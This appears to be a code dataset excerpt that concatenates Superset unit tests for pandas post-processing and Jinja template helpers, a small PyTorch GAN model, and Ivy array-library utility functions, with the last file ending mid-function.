data={
"__timestamp": pd.to_datetime(
["2022-01-11", "2022-01-12", "2022-01-13"]
),
"val, Chicago": [3.0, 0, 6.0],
"val, LA": [2.0, 0, 5.0],
"val, NY": [1.0, 0, 4.0],
}
)
)
def test_resample_should_raise_ex():
with pytest.raises(InvalidPostProcessingError):
pp.resample(
df=categories_df,
rule="1D",
method="asfreq",
)
with pytest.raises(InvalidPostProcessingError):
pp.resample(
df=timeseries_df,
rule="1D",
method="foobar",
)
def test_resample_linear():
df = pd.DataFrame(
index=to_datetime(["2019-01-01", "2019-01-05", "2019-01-08"]),
data={"label": ["a", "e", "j"], "y": [1.0, 5.0, 8.0]},
)
post_df = pp.resample(df=df, rule="1D", method="linear")
"""
label y
2019-01-01 a 1.0
2019-01-02 NaN 2.0
2019-01-03 NaN 3.0
2019-01-04 NaN 4.0
2019-01-05 e 5.0
2019-01-06 NaN 6.0
2019-01-07 NaN 7.0
2019-01-08 j 8.0
"""
assert post_df.equals(
pd.DataFrame(
index=pd.to_datetime(
[
"2019-01-01",
"2019-01-02",
"2019-01-03",
"2019-01-04",
"2019-01-05",
"2019-01-06",
"2019-01-07",
"2019-01-08",
]
),
data={
"label": ["a", np.NaN, np.NaN, np.NaN, "e", np.NaN, np.NaN, "j"],
"y": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0],
},
)
)
```
#### File: unit_tests/pandas_postprocessing/test_rolling.py
```python
import pandas as pd
import pytest
from superset.exceptions import InvalidPostProcessingError
from superset.utils import pandas_postprocessing as pp
from superset.utils.pandas_postprocessing.utils import FLAT_COLUMN_SEPARATOR
from tests.unit_tests.fixtures.dataframes import (
multiple_metrics_df,
single_metric_df,
timeseries_df,
)
from tests.unit_tests.pandas_postprocessing.utils import series_to_list
def test_rolling_should_not_side_effect():
_timeseries_df = timeseries_df.copy()
pp.rolling(
df=timeseries_df,
columns={"y": "y"},
rolling_type="sum",
window=2,
min_periods=0,
)
assert _timeseries_df.equals(timeseries_df)
def test_rolling():
# sum rolling type
post_df = pp.rolling(
df=timeseries_df,
columns={"y": "y"},
rolling_type="sum",
window=2,
min_periods=0,
)
assert post_df.columns.tolist() == ["label", "y"]
assert series_to_list(post_df["y"]) == [1.0, 3.0, 5.0, 7.0]
# mean rolling type with alias
post_df = pp.rolling(
df=timeseries_df,
rolling_type="mean",
columns={"y": "y_mean"},
window=10,
min_periods=0,
)
assert post_df.columns.tolist() == ["label", "y", "y_mean"]
assert series_to_list(post_df["y_mean"]) == [1.0, 1.5, 2.0, 2.5]
# count rolling type
post_df = pp.rolling(
df=timeseries_df,
rolling_type="count",
columns={"y": "y"},
window=10,
min_periods=0,
)
assert post_df.columns.tolist() == ["label", "y"]
assert series_to_list(post_df["y"]) == [1.0, 2.0, 3.0, 4.0]
# quantile rolling type
post_df = pp.rolling(
df=timeseries_df,
columns={"y": "q1"},
rolling_type="quantile",
rolling_type_options={"quantile": 0.25},
window=10,
min_periods=0,
)
assert post_df.columns.tolist() == ["label", "y", "q1"]
assert series_to_list(post_df["q1"]) == [1.0, 1.25, 1.5, 1.75]
# incorrect rolling type
with pytest.raises(InvalidPostProcessingError):
pp.rolling(
df=timeseries_df,
columns={"y": "y"},
rolling_type="abc",
window=2,
)
# incorrect rolling type options
with pytest.raises(InvalidPostProcessingError):
pp.rolling(
df=timeseries_df,
columns={"y": "y"},
rolling_type="quantile",
rolling_type_options={"abc": 123},
window=2,
)
def test_rolling_should_empty_df():
pivot_df = pp.pivot(
df=single_metric_df,
index=["dttm"],
columns=["country"],
aggregates={"sum_metric": {"operator": "sum"}},
flatten_columns=False,
reset_index=False,
)
rolling_df = pp.rolling(
df=pivot_df,
rolling_type="sum",
window=2,
min_periods=2,
columns={"sum_metric": "sum_metric"},
)
assert rolling_df.empty is True
def test_rolling_after_pivot_with_single_metric():
pivot_df = pp.pivot(
df=single_metric_df,
index=["dttm"],
columns=["country"],
aggregates={"sum_metric": {"operator": "sum"}},
flatten_columns=False,
reset_index=False,
)
"""
sum_metric
country UK US
dttm
2019-01-01 5 6
2019-01-02 7 8
"""
rolling_df = pp.rolling(
df=pivot_df,
columns={"sum_metric": "sum_metric"},
rolling_type="sum",
window=2,
min_periods=0,
)
"""
sum_metric
country UK US
dttm
2019-01-01 5.0 6.0
2019-01-02 12.0 14.0
"""
flat_df = pp.flatten(rolling_df)
"""
dttm sum_metric, UK sum_metric, US
0 2019-01-01 5.0 6.0
1 2019-01-02 12.0 14.0
"""
assert flat_df.equals(
pd.DataFrame(
data={
"dttm": pd.to_datetime(["2019-01-01", "2019-01-02"]),
FLAT_COLUMN_SEPARATOR.join(["sum_metric", "UK"]): [5.0, 12.0],
FLAT_COLUMN_SEPARATOR.join(["sum_metric", "US"]): [6.0, 14.0],
}
)
)
def test_rolling_after_pivot_with_multiple_metrics():
pivot_df = pp.pivot(
df=multiple_metrics_df,
index=["dttm"],
columns=["country"],
aggregates={
"sum_metric": {"operator": "sum"},
"count_metric": {"operator": "sum"},
},
flatten_columns=False,
reset_index=False,
)
"""
count_metric sum_metric
country UK US UK US
dttm
2019-01-01 1 2 5 6
2019-01-02 3 4 7 8
"""
rolling_df = pp.rolling(
df=pivot_df,
columns={
"count_metric": "count_metric",
"sum_metric": "sum_metric",
},
rolling_type="sum",
window=2,
min_periods=0,
)
"""
count_metric sum_metric
country UK US UK US
dttm
2019-01-01 1.0 2.0 5.0 6.0
2019-01-02 4.0 6.0 12.0 14.0
"""
flat_df = pp.flatten(rolling_df)
"""
dttm count_metric, UK count_metric, US sum_metric, UK sum_metric, US
0 2019-01-01 1.0 2.0 5.0 6.0
1 2019-01-02 4.0 6.0 12.0 14.0
"""
assert flat_df.equals(
pd.DataFrame(
data={
"dttm": pd.to_datetime(["2019-01-01", "2019-01-02"]),
FLAT_COLUMN_SEPARATOR.join(["count_metric", "UK"]): [1.0, 4.0],
FLAT_COLUMN_SEPARATOR.join(["count_metric", "US"]): [2.0, 6.0],
FLAT_COLUMN_SEPARATOR.join(["sum_metric", "UK"]): [5.0, 12.0],
FLAT_COLUMN_SEPARATOR.join(["sum_metric", "US"]): [6.0, 14.0],
}
)
)
```
#### File: tests/unit_tests/test_jinja_context.py
```python
import json
from typing import Any
import pytest
from flask.ctx import AppContext
from sqlalchemy.dialects.postgresql import dialect
from superset import app
from superset.exceptions import SupersetTemplateException
from superset.jinja_context import ExtraCache, safe_proxy
def test_filter_values_default(app_context: AppContext) -> None:
cache = ExtraCache()
assert cache.filter_values("name", "foo") == ["foo"]
assert cache.removed_filters == []
def test_filter_values_remove_not_present(app_context: AppContext) -> None:
cache = ExtraCache()
assert cache.filter_values("name", remove_filter=True) == []
assert cache.removed_filters == []
def test_get_filters_remove_not_present(app_context: AppContext) -> None:
cache = ExtraCache()
assert cache.get_filters("name", remove_filter=True) == []
assert cache.removed_filters == []
def test_filter_values_no_default(app_context: AppContext) -> None:
cache = ExtraCache()
assert cache.filter_values("name") == []
def test_filter_values_adhoc_filters(app_context: AppContext) -> None:
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": "foo",
"expressionType": "SIMPLE",
"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.filter_values("name") == ["foo"]
assert cache.applied_filters == ["name"]
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": ["foo", "bar"],
"expressionType": "SIMPLE",
"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.filter_values("name") == ["foo", "bar"]
assert cache.applied_filters == ["name"]
def test_get_filters_adhoc_filters(app_context: AppContext) -> None:
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": "foo",
"expressionType": "SIMPLE",
"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.get_filters("name") == [
{"op": "IN", "col": "name", "val": ["foo"]}
]
assert cache.removed_filters == []
assert cache.applied_filters == ["name"]
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": ["foo", "bar"],
"expressionType": "SIMPLE",
"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.get_filters("name") == [
{"op": "IN", "col": "name", "val": ["foo", "bar"]}
]
assert cache.removed_filters == []
with app.test_request_context(
data={
"form_data": json.dumps(
{
"adhoc_filters": [
{
"clause": "WHERE",
"comparator": ["foo", "bar"],
"expressionType": "SIMPLE",
"operator": "in",
"subject": "name",
}
],
}
)
}
):
cache = ExtraCache()
assert cache.get_filters("name", remove_filter=True) == [
{"op": "IN", "col": "name", "val": ["foo", "bar"]}
]
assert cache.removed_filters == ["name"]
assert cache.applied_filters == ["name"]
def test_filter_values_extra_filters(app_context: AppContext) -> None:
with app.test_request_context(
data={
"form_data": json.dumps(
{"extra_filters": [{"col": "name", "op": "in", "val": "foo"}]}
)
}
):
cache = ExtraCache()
assert cache.filter_values("name") == ["foo"]
assert cache.applied_filters == ["name"]
def test_url_param_default(app_context: AppContext) -> None:
with app.test_request_context():
cache = ExtraCache()
assert cache.url_param("foo", "bar") == "bar"
def test_url_param_no_default(app_context: AppContext) -> None:
with app.test_request_context():
cache = ExtraCache()
assert cache.url_param("foo") is None
def test_url_param_query(app_context: AppContext) -> None:
with app.test_request_context(query_string={"foo": "bar"}):
cache = ExtraCache()
assert cache.url_param("foo") == "bar"
def test_url_param_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "bar"}})}
):
cache = ExtraCache()
assert cache.url_param("foo") == "bar"
def test_url_param_escaped_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "O'Brien"}})}
):
cache = ExtraCache(dialect=dialect())
assert cache.url_param("foo") == "O''Brien"
def test_url_param_escaped_default_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "O'Brien"}})}
):
cache = ExtraCache(dialect=dialect())
assert cache.url_param("bar", "O'Malley") == "O''Malley"
def test_url_param_unescaped_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "O'Brien"}})}
):
cache = ExtraCache(dialect=dialect())
assert cache.url_param("foo", escape_result=False) == "O'Brien"
def test_url_param_unescaped_default_form_data(app_context: AppContext) -> None:
with app.test_request_context(
query_string={"form_data": json.dumps({"url_params": {"foo": "O'Brien"}})}
):
cache = ExtraCache(dialect=dialect())
assert cache.url_param("bar", "O'Malley", escape_result=False) == "O'Malley"
def test_safe_proxy_primitive(app_context: AppContext) -> None:
def func(input_: Any) -> Any:
return input_
assert safe_proxy(func, "foo") == "foo"
def test_safe_proxy_dict(app_context: AppContext) -> None:
def func(input_: Any) -> Any:
return input_
assert safe_proxy(func, {"foo": "bar"}) == {"foo": "bar"}
def test_safe_proxy_lambda(app_context: AppContext) -> None:
def func(input_: Any) -> Any:
return input_
with pytest.raises(SupersetTemplateException):
safe_proxy(func, lambda: "bar")
def test_safe_proxy_nested_lambda(app_context: AppContext) -> None:
def func(input_: Any) -> Any:
return input_
with pytest.raises(SupersetTemplateException):
safe_proxy(func, {"foo": lambda: "bar"})
``` |
{
"source": "7wikd/GAN-Digit-Creator",
"score": 3
} |
#### File: GAN-Digit-Creator/Simple-GAN/model.py
```python
import torch
import torch.nn as nn
import torchvision
class Discriminator(nn.Module):
def __init__(self,in_features):
super().__init__()
self.disc = nn.Sequential(
nn.Linear(in_features,128),
nn.LeakyReLU(0.01),
nn.Linear(128, 1),
nn.Sigmoid()
)
def forward(self,x):
return self.disc(x)
class Generator(nn.Module):
def __init__(self,z_dim,img_dim):
super().__init__()
self.gen = nn.Sequential(
nn.Linear(z_dim, 256),
nn.LeakyReLU(0.01),
nn.Linear(256,img_dim),
nn.Tanh()
)
def forward(self,x):
return self.gen(x)
``` |
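A quick shape check of the two modules, assuming MNIST-style images flattened to 784 features and a 64-dimensional noise vector (common choices, but assumptions here rather than anything fixed by the file):
```python
import torch

from model import Discriminator, Generator  # assuming this script sits next to model.py

img_dim, z_dim, batch = 784, 64, 16
disc = Discriminator(in_features=img_dim)
gen = Generator(z_dim=z_dim, img_dim=img_dim)

noise = torch.randn(batch, z_dim)
fake = gen(noise)    # shape (16, 784), values in [-1, 1] from Tanh
scores = disc(fake)  # shape (16, 1), values in (0, 1) from Sigmoid
print(fake.shape, scores.shape)
```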
{
"source": "7wikd/ivy",
"score": 3
} |
#### File: backends/torch/set.py
```python
import torch
from typing import Tuple
from collections import namedtuple
def unique_inverse(x: torch.Tensor) \
-> Tuple[torch.Tensor, torch.Tensor]:
out = namedtuple('unique_inverse', ['values', 'inverse_indices'])
values, inverse_indices = torch.unique(x, return_inverse=True)
nan_idx = torch.isnan(x)
if nan_idx.any():
inverse_indices[nan_idx] = torch.where(torch.isnan(values))[0][0]
inverse_indices = inverse_indices.reshape(x.shape)
return out(values, inverse_indices)
def unique_values(x: torch.Tensor) \
-> torch.Tensor:
return torch.unique(x)
def unique_counts(x: torch.Tensor) \
-> Tuple[torch.Tensor, torch.Tensor]:
v, c = torch.unique(torch.reshape(x, [-1]), return_counts=True)
nan_idx = torch.where(torch.isnan(v))
c[nan_idx] = 1
uc = namedtuple('uc', ['values', 'counts'])
return uc(v, c)
```
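`torch.unique` treats every NaN as a distinct value (NaN != NaN), which is what the helpers above compensate for: `unique_inverse` points each NaN in the input at the first NaN in `values`, and `unique_counts` pins NaN counts to 1. A standalone look at the underlying behaviour (numbers are arbitrary):
```python
import torch

x = torch.tensor([1.0, float("nan"), 2.0, float("nan"), 1.0])

values, counts = torch.unique(x, return_counts=True)
print(values)  # each NaN shows up separately, e.g. tensor([1., 2., nan, nan])
print(counts)  # e.g. tensor([2, 1, 1, 1])

# unique_counts above then forces the NaN entries' counts to 1:
counts[torch.where(torch.isnan(values))] = 1
print(counts)
```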
#### File: functional/ivy/general.py
```python
import gc
import math
import einops
import inspect
import numpy as np
from numbers import Number
from typing import Callable, Any, Union, List, Tuple, Dict, Iterable, Optional
# local
import ivy
from ivy.functional.ivy.device import dev
from ivy.framework_handler import current_framework as _cur_framework
FN_CACHE = dict()
INF = float('inf')
TIMEOUT = 15.0
TMP_DIR = '/tmp'
def get_referrers_recursive(item, depth=0, max_depth=None, seen_set=None, local_set=None):
seen_set = ivy.default(seen_set, set())
local_set = ivy.default(local_set, set())
ret_cont = ivy.Container(
repr=str(item).replace(' ', ''), alphabetical_keys=False, keyword_color_dict={'repr': 'magenta'})
referrers = [ref for ref in gc.get_referrers(item) if
not (isinstance(ref, dict) and
min([k in ref for k in ['depth', 'max_depth', 'seen_set', 'local_set']]))]
local_set.add(str(id(referrers)))
for ref in referrers:
ref_id = str(id(ref))
if ref_id in local_set or hasattr(ref, 'cell_contents'):
continue
seen = ref_id in seen_set
seen_set.add(ref_id)
refs_rec = lambda: get_referrers_recursive(ref, depth + 1, max_depth, seen_set, local_set)
this_repr = 'tracked' if seen else str(ref).replace(' ', '')
if not seen and (not max_depth or depth < max_depth):
val = ivy.Container(
repr=this_repr, alphabetical_keys=False, keyword_color_dict={'repr': 'magenta'})
refs = refs_rec()
for k, v in refs.items():
val[k] = v
else:
val = this_repr
ret_cont[str(ref_id)] = val
return ret_cont
def is_native_array(x: Any, exclusive: bool = False)\
-> bool:
"""
Determines whether the input x is a Native Array.
:param x: The input to check
:type x: any
:param exclusive: Whether to check if the data type is exclusively an array, rather than a variable or traced array.
:type exclusive: bool, optional
:return: Boolean, whether or not x is an array.
"""
try:
return _cur_framework(x).is_native_array(x, exclusive)
except ValueError:
return False
def is_ivy_array(x: Any, exclusive: bool = False)\
-> bool:
"""
Determines whether the input x is an Ivy Array.
:param x: The input to check
:type x: any
:param exclusive: Whether to check if the data type is exclusively an array, rather than a variable or traced array.
:type exclusive: bool, optional
:return: Boolean, whether or not x is an array.
"""
return isinstance(x, ivy.Array) and ivy.is_native_array(x.data, exclusive)
# noinspection PyShadowingNames
def copy_array(x: Union[ivy.Array, ivy.NativeArray])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Copy an array.
:param x: The array to copy
:type x: array
:return: A copy of the input array.
"""
return _cur_framework(x).copy_array(x)
def array_equal(x0: Union[ivy.Array, ivy.NativeArray], x1: Union[ivy.Array, ivy.NativeArray])\
-> bool:
"""
Determines whether two input arrays are equal across all elements.
:param x0: The first input array to compare.
:type x0: array
:param x1: The second input array to compare.
:type x1: array
:return: Boolean, whether or not the input arrays are equal across all elements.
"""
return _cur_framework(x0).array_equal(x0, x1)
def arrays_equal(xs: List[Union[ivy.Array, ivy.NativeArray]])\
-> bool:
"""
Determines whether input arrays are equal across all elements.
:param xs: Sequence of arrays to compare for equality
:type xs: sequence of arrays
:return: Boolean, whether or not all of the input arrays are equal across all elements.
"""
x0 = xs[0]
for x in xs[1:]:
if not array_equal(x0, x):
return False
return True
def all_equal(*xs: Iterable[Any], equality_matrix: bool = False)\
-> Union[bool, Union[ivy.Array, ivy.NativeArray]]:
"""
Determines whether the inputs are all equal.
:param xs: inputs to compare.
:type xs: any
:param equality_matrix: Whether to return a matrix of equalities comparing each input with every other.
Default is False.
:type equality_matrix: bool, optional
:return: Boolean, whether or not the inputs are equal, or matrix array of booleans if equality_matrix=True is set.
"""
equality_fn = ivy.array_equal if ivy.is_native_array(xs[0]) else lambda a, b: a == b
if equality_matrix:
num_arrays = len(xs)
mat = [[None for _ in range(num_arrays)] for _ in range(num_arrays)]
for i, xa in enumerate(xs):
for j_, xb in enumerate(xs[i:]):
j = j_ + i
res = equality_fn(xa, xb)
if ivy.is_native_array(res):
# noinspection PyTypeChecker
res = ivy.to_scalar(res)
# noinspection PyTypeChecker
mat[i][j] = res
# noinspection PyTypeChecker
mat[j][i] = res
return ivy.array(mat)
x0 = xs[0]
for x in xs[1:]:
if not equality_fn(x0, x):
return False
return True
def to_numpy(x: Union[ivy.Array, ivy.NativeArray])\
-> np.ndarray:
"""
Converts array into a numpy array.
:param x: Input array.
:type x: array
:return: A numpy array.
"""
return _cur_framework(x).to_numpy(x)
def to_scalar(x: Union[ivy.Array, ivy.NativeArray])\
-> Number:
"""
Converts an array with a single element into a scalar.
:param x: Input array with a single element.
:type x: array
:return: A scalar.
"""
return _cur_framework(x).to_scalar(x)
def to_list(x: Union[ivy.Array, ivy.NativeArray])\
-> List:
"""
Creates a (possibly nested) list from input array.
:param x: Input array.
:type x: array
:return: A list representation of the input array.
"""
return _cur_framework(x).to_list(x)
def clip_vector_norm(x: Union[ivy.Array, ivy.NativeArray], max_norm: float, p: float = 2.0)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Clips (limits) the vector p-norm of an array.
:param x: Input array containing elements to clip.
:type x: array
:param max_norm: The maximum value of the array norm.
:type max_norm: float
:param p: The p-value for computing the p-norm. Default is 2.
:type p: float, optional
:return: An array with the vector norm downscaled to the max norm if needed.
"""
norm = ivy.vector_norm(x, keepdims=True, ord=p)
ratio = ivy.stable_divide(max_norm, norm)
if ratio < 1:
return ratio * x
return x
def clip_matrix_norm(x: Union[ivy.Array, ivy.NativeArray], max_norm: float, p: float = 2.0)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Clips (limits) the matrix norm of an array.
:param x: Input array containing elements to clip.
:type x: array
:param max_norm: The maximum value of the array norm.
:type max_norm: float
:param p: The p-value for computing the p-norm. Default is 2.
:type p: float, optional
:return: An array with the matrix norm downscaled to the max norm if needed.
"""
norms = ivy.matrix_norm(x, p, keepdims=True)
ratios = ivy.maximum(ivy.stable_divide(max_norm, norms), 1.)
return ratios * x
def floormod(x: Union[ivy.Array, ivy.NativeArray], y: Union[ivy.Array, ivy.NativeArray])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Returns element-wise remainder of division.
:param x: Input array to floormod.
:type x: array
:param y: Denominator input for floormod.
:type y: array
:return: An array of the same shape and type as x, with the elements floor modded.
"""
return _cur_framework(x).floormod(x, y)
def unstack(x: Union[ivy.Array, ivy.NativeArray], axis: int, keepdims: bool = False)\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Unpacks the given dimension of a rank-R array into rank-(R-1) arrays.
:param x: Input array to unstack.
:type x: array
:param axis: Axis for which to unpack the array.
:type axis: int
:param keepdims: Whether to keep dimension 1 in the unstack dimensions. Default is False.
:type keepdims: bool, optional
:return: List of arrays, unpacked along specified dimensions.
"""
return _cur_framework(x).unstack(x, axis, keepdims)
def fourier_encode(x: Union[ivy.Array, ivy.NativeArray], max_freq: Union[float, Union[ivy.Array, ivy.NativeArray]],
num_bands: int = 4, linear: bool = False, concat: bool = True, flatten: bool = False)\
-> Union[ivy.Array, ivy.NativeArray, Tuple]:
"""
Pads an array with fourier encodings.
:param x: Input array to encode.
:type x: array
:param max_freq: The maximum frequency of the encoding.
:type max_freq: float
:param num_bands: The number of frequency bands for the encoding. Default is 4.
:type num_bands: int, optional
:param linear: Whether to space the frequency bands linearly as opposed to geometrically. Default is False.
:type linear: bool, optional
    :param concat: Whether to concatenate the position, sin and cos values, or return separately. Default is True.
:type concat: bool, optional
:param flatten: Whether to flatten the position dimension into the batch dimension. Default is False.
:type flatten: bool, optional
:return: New array with the final dimension expanded, and the encodings stored in this channel.
"""
x_in = x
dim = x.shape[-1]
x = ivy.expand_dims(x, -1)
orig_x = x
if linear:
scales = ivy.linspace(1., max_freq / 2, num_bands, dev=dev(x))
else:
if ivy.backend == 'torch' and isinstance(max_freq,float):
scales = ivy.logspace(0., ivy.log(ivy.array(max_freq / 2)) / math.log(10), num_bands, base=10, dev=dev(x))
else:
scales = ivy.logspace(0., ivy.log(max_freq / 2) / math.log(10), num_bands, base=10, dev=dev(x))
scales = ivy.astype(scales, ivy.dtype(x))
scales = scales[(*((None,) * (len(x.shape) - len(scales.shape))), Ellipsis)]
x = x * scales * math.pi
sin_x = ivy.sin(x)
cos_x = ivy.cos(x)
if flatten:
orig_x = x_in
sin_x = ivy.reshape(sin_x, [-1, num_bands*dim])
cos_x = ivy.reshape(cos_x, [-1, num_bands*dim])
if concat:
return ivy.concat([orig_x, sin_x, cos_x], -1)
return sin_x, cos_x
def value_is_nan(x: Union[ivy.Array, ivy.NativeArray, Number], include_infs: bool = True)\
-> bool:
"""
    Determine whether the single valued array or scalar is of nan type.
    :param x: The input to check.
:type x: array
:param include_infs: Whether to include infs and -infs in the check. Default is True.
:type include_infs: bool, optional
:return Boolean as to whether the input value is a nan or not.
"""
x_scalar = ivy.to_scalar(x) if ivy.is_native_array(x) else x
if not x_scalar == x_scalar:
return True
if include_infs and (x_scalar == INF or x_scalar == -INF):
return True
return False
def has_nans(x: Union[ivy.Array, ivy.NativeArray], include_infs: bool = True)\
-> bool:
"""
Determine whether the array contains any nans, as well as infs or -infs if specified.
:param x: Input array.
:type x: array
:param include_infs: Whether to include infs and -infs in the check. Default is True.
:type include_infs: bool, optional
:return: Boolean as to whether the array contains nans.
"""
return value_is_nan(ivy.sum(x), include_infs)
def exists(x: Any)\
-> bool:
"""
Simple check as to whether the input is None or not.
:param x: Input to check.
:type x: any
:return: True if x is not None, else False.
"""
return x is not None
def default(x: Any, default_val: Any, catch_exceptions: bool = False, rev: bool = False, with_callable: bool = False)\
-> Any:
"""
Returns x provided it exists (is not None), else returns default value.
:param x: Input which may or may not exist (be None).
:type x: value if catch_exceptions=False else callable
:param default_val: The default value.
:type default_val: any
:param catch_exceptions: Whether to catch exceptions from callable x. Default is False.
:type catch_exceptions: bool, optional
:param rev: Whether to reverse the input x and default_val. Default is False.
:type rev: bool, optional
:param with_callable: Whether either of the arguments might be callable functions. Default is False.
:type with_callable: bool, optional
:return: x if x exists (is not None), else default.
"""
with_callable = catch_exceptions or with_callable
if rev:
tmp = x
x = default_val
default_val = tmp
if with_callable:
x_callable = callable(x)
default_callable = callable(default_val)
else:
x_callable = False
default_callable = False
if catch_exceptions:
# noinspection PyBroadException
try:
x = x() if x_callable else x
except Exception:
return default_val() if default_callable else default_val
else:
x = x() if x_callable else x
return x if exists(x) else default_val() if default_callable else default_val
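def _default_example():
    # Editor's hedged usage sketch (not part of the original source).
    a = default(None, 10)                                  # -> 10
    b = default(5, 10)                                     # -> 5
    c = default(lambda: 1 / 0, 10, catch_exceptions=True)  # -> 10, exception caught
    return a, b, c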
def shape_to_tuple(shape: Union[int, Tuple[int], List[int]]):
"""
Returns a tuple representation of the input shape.
:param shape: The shape input to convert to tuple representation.
:return: The shape in tuple representation.
"""
if isinstance(shape, int):
return (shape,)
else:
return tuple(shape)
def try_else_none(fn):
"""
Try to call the function and return its result, or return None if an exception is raised during execution.
:param fn: Function to try and call and return.
:type fn: callable
"""
return default(fn, None, True)
def arg_names(receiver):
"""
Get the expected keyword arguments for a function or class constructor.
"""
return list(inspect.signature(receiver).parameters.keys())
def match_kwargs(kwargs, *receivers, allow_duplicates=False):
"""
Match keyword arguments to either class or function receivers.
:param kwargs: Keyword arguments to match.
:type kwargs: dict of any
:param receivers: Functions and/or classes to match the keyword arguments to.
:type receivers: callables and/or classes
:param allow_duplicates: Whether to allow one keyword argument to be used for multiple receivers. Default is False.
:type allow_duplicates: bool, optional
:return: Sequence of keyword arguments split as best as possible.
"""
split_kwargs = list()
for receiver in receivers:
expected_kwargs = arg_names(receiver)
found_kwargs = {k: v for k, v in kwargs.items() if k in expected_kwargs}
if not allow_duplicates:
for k in found_kwargs.keys():
del kwargs[k]
split_kwargs.append(found_kwargs)
if len(split_kwargs) == 1:
return split_kwargs[0]
return split_kwargs
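def _match_kwargs_example():
    # Editor's hedged usage sketch (not part of the original source): splits one
    # kwargs dict between two receivers based on their signatures.
    def foo(a, b):
        return a + b
    def bar(c):
        return c
    foo_kwargs, bar_kwargs = match_kwargs({'a': 1, 'b': 2, 'c': 3}, foo, bar)
    return foo(**foo_kwargs), bar(**bar_kwargs)  # -> (3, 3)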
def cache_fn(func: Callable)\
-> Callable:
"""
Wrap a function, such that repeated calls with the same arguments return a previously cached output.
:param func: The function to wrap, whose output should be cached for later.
:type func: callable
:return: The newly cache wrapped function.
"""
global FN_CACHE
if func not in FN_CACHE:
FN_CACHE[func] = dict()
def cached_fn(*args, **kwargs):
key = ''.join([str(i) + ', ' for i in args] + [' kw, '] + [str(i) + ', ' for i in sorted(kwargs.items())])
cache = FN_CACHE[func]
if key in cache:
return cache[key]
ret = func(*args, **kwargs)
cache[key] = ret
return ret
return cached_fn
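def _cache_fn_example():
    # Editor's hedged usage sketch (not part of the original source): memoise a
    # pure function so repeated calls with the same arguments reuse the result.
    def square(n):
        return n * n
    cached_square = cache_fn(square)
    first = cached_square(3)   # computed and stored in FN_CACHE
    second = cached_square(3)  # served from FN_CACHE
    return first, second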
def current_framework_str()\
-> Union[str, None]:
"""
Return the string of the current globally set framework. Returns None if no framework is set.
:return: The framework string.
"""
fw = _cur_framework()
if fw is None:
return None
return fw.current_framework_str()
def einops_rearrange(x: Union[ivy.Array, ivy.NativeArray], pattern: str, **axes_lengths: Dict[str, int])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Perform einops rearrange operation on input array x.
:param x: Input array to be re-arranged.
:type x: array
:param pattern: Rearrangement pattern.
:type pattern: str
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: New array with einops.rearrange having been applied.
"""
return einops.rearrange(x, pattern, **axes_lengths)
def einops_reduce(x: Union[ivy.Array, ivy.NativeArray], pattern: str, reduction: Union[str, Callable],
**axes_lengths: Dict[str, int]) -> Union[ivy.Array, ivy.NativeArray]:
"""
Perform einops reduce operation on input array x.
:param x: Input array to be reduced.
:type x: array
:param pattern: Reduction pattern.
:type pattern: str
:param reduction: One of available reductions ('min', 'max', 'sum', 'mean', 'prod'), or callable.
:type reduction: str or callable
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: New array with einops.reduce having been applied.
"""
return einops.reduce(x, pattern, reduction, **axes_lengths)
def einops_repeat(x: Union[ivy.Array, ivy.NativeArray], pattern: str, **axes_lengths: Dict[str, int])\
-> Union[ivy.Array, ivy.NativeArray]:
"""
Perform einops repeat operation on input array x.
:param x: Input array to be repeated.
:type x: array
:param pattern: Rearrangement pattern.
:type pattern: str
:param axes_lengths: Any additional specifications for dimensions.
:type axes_lengths: keyword parameter args
:return: New array with einops.repeat having been applied.
"""
return einops.repeat(x, pattern, **axes_lengths)
def get_min_denominator()\
-> float:
"""
Get the global minimum denominator used by ivy for numerically stable division.
"""
# noinspection PyProtectedMember
return ivy._MIN_DENOMINATOR
def set_min_denominator(val: float)\
-> None:
"""
Set the global minimum denominator used by ivy for numerically stable division.
:param val: The new value to set the minimum denominator to.
:type val: float
"""
ivy._MIN_DENOMINATOR = val
def get_min_base()\
-> float:
"""
Get the global minimum base used by ivy for numerically stable power raising.
"""
# noinspection PyProtectedMember
return ivy._MIN_BASE
def set_min_base(val: float)\
-> None:
"""
Set the global minimum base used by ivy for numerically stable power raising.
:param val: The new value to set the minimum base to.
:type val: float
"""
ivy._MIN_BASE = val
def stable_divide(numerator: Any, denominator: Any, min_denominator: float = None) -> Any:
"""
Divide the numerator by the denominator, with min denominator added to the denominator for numerical stability.
:param numerator: The numerator of the division.
:type numerator: any valid numerator, including containers
:param denominator: The denominator of the division.
:type denominator: any valid denominator, including containers
:param min_denominator: The minimum denominator to use, use global ivy._MIN_DENOMINATOR by default.
:type min_denominator: float, optional
:return: The new item following the numerically stable division.
"""
# noinspection PyProtectedMember
return numerator / (denominator + default(min_denominator, ivy._MIN_DENOMINATOR))
def stable_pow(base: Any, exponent: Any, min_base: float = None)\
-> Any:
"""
